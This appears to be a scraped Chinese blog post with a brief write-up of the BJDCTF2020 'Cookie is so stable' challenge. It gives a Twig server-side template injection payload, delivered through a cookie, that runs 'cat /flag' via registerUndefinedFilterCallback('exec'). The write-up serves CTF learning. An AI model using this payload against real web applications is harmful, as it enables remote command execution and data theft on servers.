当前位置:网站首页>[BJDCTF2020]Cookie is so stable
[BJDCTF2020]Cookie is so stable
2022-07-13 17:41:00 【Bnessy】

找了一圈,在flag.php页面发现一个输入框,抓包看下
提示要在cookie进行攻击,应该是个SSTI模板注入,传入{ {7*7}}
返回49,用的是Twig模块
payload:{ {_self.env.registerUndefinedFilterCallback("exec")}}{ {_self.env.getFilter("cat /flag")}}
边栏推荐
- dva数据流
- 37.js--对象的成员操作和原型对象的操作(主要是相关程序举例)
- CONDA based operation record of starting a tensorflow GPU (2.6.0) environment on win10 from scratch (2022.07)
- 扩展知识——JS的劫持技术
- JS作用域链
- Svelte official introductory tutorial (2) - reactivity
- 创建/删除 表空间/用户
- c语言中的输入输出函数之scanf函数
- ES6新增的模块化
- (cvpr-2022) Lagrangian motion analysis and perspective embedding for improved gait recognition
猜你喜欢

【黄啊码】微软IE浏览器将退役 网友说:以后考试报名咋办?

ES6--symbol( )与Map( )
![[Huang ah code] Microsoft Internet Explorer will be retired. Netizens said: what should I do in the future?](/img/38/42fffa40b5db9399ee8c526e0c4439.png)
[Huang ah code] Microsoft Internet Explorer will be retired. Netizens said: what should I do in the future?

vue+axios+mysql实现分页查询,条件查询以及批量删除

Windows system disk slimming (Development)

JS根据二进制数据下载文件

Idea automatically exports SQL statements of tables in the database

40.js--同名标识符提升问题

window系统盘瘦身(开发)

c语言中的输入输出函数之scanf函数
随机推荐
JS预编译
Idea automatically generates entity classes of corresponding tables in the database
What if there is no scroll bar on the right side of the page and you can't see the content beyond it?
【黄啊码】PHP配合微信公众号生成推广二维码
单文件组件
【黄啊码】微信小程序+php实现即时通讯聊天功能
【黄啊码】MySQL入门—2、使用数据定义语言(DDL)操作数据库
Notes - Chang Geng
[tensorflow2] implementation of gradient inversion layer (GRL) and domain antagonism training neural network (Dann)
[Huang ah code] teacher, I want to choose software development related majors after the college entrance examination. Which direction do you think is good? How to fill in the college entrance examinat
组件化编程之组件基础
ES6新增的模块化
Understanding service governance in distributed development
Ant Design upload component custom upload
【黄啊码】微软IE浏览器将退役 网友说:以后考试报名咋办?
js 数字序号 转 字母序号
模块化-CMJ&ESM
36.js--原型链2--(笔试题为主)
网络安全应急响应-基础技能
: class modify style